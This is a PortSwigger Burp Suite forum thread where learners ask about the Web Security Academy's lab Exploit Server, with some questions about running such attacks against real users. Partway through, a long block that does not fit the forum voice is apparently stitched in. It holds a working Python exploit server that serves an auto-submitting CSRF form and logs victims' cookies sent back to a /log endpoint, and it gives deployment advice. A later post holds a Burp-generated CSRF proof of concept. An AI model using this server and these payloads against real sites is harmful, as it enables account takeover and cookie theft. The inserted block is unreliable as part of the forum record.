Burp Suite User Forum


Exploit Server

Miguel | Last updated: Oct 31, 2020 09:36PM UTC

Good day. How can I set up a test exploit server, or is there any option online that can be used to test the HTTP attacks part? Cheers...

Ben, PortSwigger Agent | Last updated: Nov 02, 2020 08:12AM UTC

Hi, Are you referring to the Exploit Server that is used in some of the Web Academy labs?

Miguel | Last updated: Nov 02, 2020 10:01PM UTC

Hello, yes. I used it in the Host header attack labs, where they provide us with an exploit server to capture cookies.

Ben, PortSwigger Agent | Last updated: Nov 03, 2020 08:53AM UTC

Hi, The Exploit Server is just something that we use in our Web Academy in order to make delivering exploits easier for the user. Some of the topics covered, for example, would require you to host exploits for victim users to access - we simulate this with the Exploit Server and dummy victim users.

David | Last updated: Dec 31, 2020 07:24PM UTC

Miguel - I realize you may have found that reply unhelpful, as did I. I searched for 30 minutes on HOW to access the exploit server. I finally saw it as a button at the top of the page when you are in 'activate lab'. Hope this helps.

mrloup98 | Last updated: Mar 02, 2021 10:08PM UTC

I cannot find it. Can you help me please?

Ben, PortSwigger Agent | Last updated: Mar 03, 2021 08:16AM UTC

Hi, If the lab you are trying to solve involves the use of the Exploit Server then there will be an orange button at the top of the page to access the server once you have launched the lab.

arya | Last updated: Apr 10, 2021 10:51AM UTC

Hello PortSwigger, is it possible to draw a diagram of how the exploit server interacts with the client in labs such as XSS (https://portswigger.net/web-security/images/cross-site-scripting.svg)? Thanks for the nice labs and materials. Mohammad

Michelle, PortSwigger Agent | Last updated: Apr 13, 2021 10:20AM UTC

There isn't anything special about the exploit server in this case and it's not specific to XSS. The browser just fetches the referenced script file like it would any other referenced resources e.g. images etc. The only difference is that the attacker has been able to point the reference to an external domain (like the exploit server) to trick the browser into loading a malicious resource rather than a legitimate/expected one. We're planning on producing some more content about web fundamentals like this in the future.

Miguel | Last updated: Jun 11, 2021 01:42AM UTC

Thanks everyone for the responses. Regards!

Mayank | Last updated: Oct 12, 2021 05:48PM UTC

Hey, can I use the Exploit Server in a real-world bug bounty program to verify or prove a finding (e.g. CSRF)? Thanks

Michelle, PortSwigger Agent | Last updated: Oct 13, 2021 08:29AM UTC

The exploit server included with the labs is specifically for the Web Security Academy. If you wanted to use an exploit server in the real world, you can set up your own server to host the exploits.

Md | Last updated: Nov 01, 2021 04:26AM UTC

Hi PortSwigger Team, actually, I want to know the real-life scenario behind your lab exploit server. What would we do if it didn't exist? I know it is something, but I want to know more and more.

Ben, PortSwigger Agent | Last updated: Nov 01, 2021 08:35AM UTC

Hi, As noted above, you would need to create your own server that would be used to host your exploits. You would then also need some way of getting your 'victims' to access the exploits contained on your server. We simulate this process using the victim user and exploit server in our Web Academy so that you do not have to spend time creating these things - you can concentrate your time on actually learning about the vulnerabilities.

Imtiyaz | Last updated: Aug 02, 2022 06:04AM UTC

Is there any way we can set up our own server for free, without any cost?

Amit | Last updated: Mar 06, 2023 05:16AM UTC

I read the above posts and I want to act as a victim, enter the credentials and then attempt the attack. How do I do it?

Ben, PortSwigger Agent | Last updated: Mar 06, 2023 09:04AM UTC

Hi Amit, Are you able to explain what you are trying to do in a bit more detail so that we have a better understanding of what you are trying to achieve?

soid3t | Last updated: Apr 02, 2023 10:06AM UTC

So how do I actually inject a similar iframe payload in the wild without this exploit server?

dashk4 | Last updated: Apr 02, 2023 08:22PM UTC

URL: https://exploit-0a83002b049f84e48148c50a01830012.exploit-server.net/exploit

dashk4 | Last updated: Apr 02, 2023 08:23PM UTC

Heyo, I'm here.

cainesmckoy | Last updated: May 08, 2023 07:34PM UTC

@soid3t you would have to host a public web server, host the iframe on that web server, then trick a user into browsing to your page unsuspectingly, because it would appear to be a legit site, thus allowing your attack to run on a victim. I believe that's the kind of answer you are looking for.
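To make Ben's earlier reply ("create your own server that would be used to host your exploits") and cainesmckoy's comment above concrete, here is a minimal self-hosted stand-in for the Academy exploit server. This is an added example, not PortSwigger's code; it assumes the same two-route layout as the lab server (GET /exploit serves the stored page, GET /log records whatever a victim browser sends back), the target URL is a placeholder you replace with a host you are authorised to test, and the CSRF payload it serves is constructed here in the same shape as Burp's generated PoC.

```python
"""Self-hosted stand-in for the Academy exploit server (added example, not PortSwigger code).

Assumed layout, mirroring the lab server: GET /exploit serves the stored page,
GET /log records whatever the victim's browser sends back (e.g. a stolen cookie
appended to the query string). Nothing here is specific to one vulnerability;
the same server can host a CSRF form, an XSS redirector or a Host-header payload.
"""
import http.server
import socketserver
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

# Constructed payload: a CSRF PoC of the same shape as a Burp-generated one.
# TARGET is a placeholder; point it at a host you are authorised to test.
TARGET = "https://target.example/my-account/change-email"
EXPLOIT_HTML = f"""<html>
<body>
<form action="{TARGET}" method="POST">
  <input type="hidden" name="email" value="attacker@example.net">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
"""

ACCESS_LOG = []  # in-memory; a real server would append to a file


def handle(path, headers, client_ip):
    """Pure routing logic, kept separate from the socket code so it can be tested.

    Returns (status, content_type, body). Hits on /log are appended to ACCESS_LOG
    with the query string parsed, so a `fetch('/log?c=' + document.cookie)` style
    callback shows up as a dict entry instead of a raw line to eyeball.
    """
    parsed = urlparse(path)
    hdrs = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    if parsed.path == "/exploit":
        return 200, "text/html; charset=utf-8", EXPLOIT_HTML.encode()
    if parsed.path == "/log":
        ACCESS_LOG.append({
            "time": datetime.now(timezone.utc).isoformat(),
            "ip": client_ip,
            "query": parse_qs(parsed.query),
            # Referer tells you which page on the target triggered the callback.
            "referer": hdrs.get("referer", ""),
            "user_agent": hdrs.get("user-agent", ""),
        })
        return 200, "text/plain", b"ok"
    return 404, "text/plain", b"not found"


class ExploitHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        status, ctype, body = handle(self.path, dict(self.headers), self.client_address[0])
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # ACCESS_LOG is the record we care about; silence stderr noise


def serve(port=8000):
    """Bind on all interfaces so a victim browser on another host can reach it."""
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("0.0.0.0", port), ExploitHandler) as srv:
        print(f"exploit server on http://0.0.0.0:{port}/exploit ; callbacks to /log")
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Run it with `python3 exploit_server.py`, browse to /exploit yourself first to check the payload behaves as intended, then deliver the URL to the victim (in a real engagement that means a host the victim can actually reach, i.e. a public IP or a tunnel, and a target you are authorised to test). The lab server does the same two jobs for you: it hosts the page and simulates a victim visiting it.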

srinivas | Last updated: Sep 28, 2023 07:38AM UTC

This is your server. You can use the form below to save an exploit, and send it to the victim. Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp's Browser or Chrome. Please help.

Ben, PortSwigger Agent | Last updated: Sep 28, 2023 08:43AM UTC

Hi Srinivas, Are you able to clarify what you need help with?

kaarthi | Last updated: Mar 11, 2024 04:34PM UTC

Hello! "This is your server. You can use the form below to save an exploit, and send it to the victim. Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp's Browser or Chrome." I'm getting the above line while exploiting the server, and because of this I'm unable to solve my CSRF vulnerability labs... Kindly let me know the steps to solve this issue.

Ben, PortSwigger Agent | Last updated: Mar 11, 2024 05:52PM UTC

Hi Kaarthi, Are you able to clarify what you are trying to do? The text that you refer to is the standard text provided in the exploit server so should not impact the delivery of your exploit.

kaarthi | Last updated: Mar 12, 2024 08:58AM UTC

No, I still get this issue... Actually, when I'm trying to access the CSRF lab, even though my methodology is right I'm not able to submit the exploit. When I submit the request I can see the following: "This is your server. You can use the form below to save an exploit, and send it to the victim. Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp's Browser or Chrome." What does it mean? And how do I resolve it?

Ben, PortSwigger Agent | Last updated: Mar 12, 2024 09:27AM UTC

Hi Kaarthi, Are you able to send us an email at support@portswigger.net with some screenshots of what you are doing so that we can see this more clearly? When you deliver the exploit to the victim the exploit server page simply refreshes so you will continue to see the text. For some of these labs, simply delivering the correct exploit will solve the lab (and you will see this in the banner at the top of the page) for others there might be additional steps.

Megha | Last updated: Jul 10, 2024 05:58AM UTC

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://0a1100d503627900822dc4d900a400d2.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="testing&#64;gmail&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Ben, PortSwigger Agent | Last updated: Jul 10, 2024 08:22AM UTC

Hi Megha, Are you having issues with this lab?
